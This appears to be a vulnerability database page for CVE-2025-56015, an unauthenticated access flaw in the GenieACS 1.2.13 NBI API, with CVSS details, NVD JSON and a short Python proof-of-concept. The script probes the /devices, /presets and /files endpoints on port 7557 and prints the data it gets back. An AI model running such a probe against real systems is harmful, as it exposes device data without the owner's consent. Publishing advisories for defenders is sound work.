Security Vulnerability Report
中文
CVE-2025-56015 CVSS 7.5 HIGH

CVE-2025-56015

Published: 2026-04-07 20:16:23
Last Modified: 2026-04-10 19:02:31

Description

In GenieACS 1.2.13, an unauthenticated access vulnerability exists in the NBI API endpoint.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:genieacs:genieacs:1.2.13:*:*:*:*:*:*:* - VULNERABLE
GenieACS 1.2.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: GenieACS 1.2.13 NBI API Unauthenticated Access # Description: Checks if the NBI API is accessible without authentication. target_url = "http://target-ip:7557" # Default NBI port check_paths = ["/devices", "/presets", "/files"] def check_vulnerability(): print(f"[*] Checking target: {target_url}") for path in check_paths: url = f"{target_url}{path}" try: response = requests.get(url, timeout=5) if response.status_code == 200: print(f"[+] Potential Vulnerability found at: {url}") print(f"[+] Response snippet: {response.text[:100]}") else: print(f"[-] Status {response.status_code} for {url}") except requests.ConnectionError: print(f"[!] Could not connect to {target_url}") break except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56015", "sourceIdentifier": "[email protected]", "published": "2026-04-07T20:16:22.790", "lastModified": "2026-04-10T19:02:30.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In GenieACS 1.2.13, an unauthenticated access vulnerability exists in the NBI API endpoint."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:genieacs:genieacs:1.2.13:*:*:*:*:*:*:*", "matchCriteriaId": "941E4964-CBF1-4A75-A497-5B93DC9A0E25"}]}]}], "references": [{"url": "https://github.com/e1st/CVE-2025-56015", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/genieacs/genieacs/", "source": "[email protected]", "tags": ["Product"]}]}}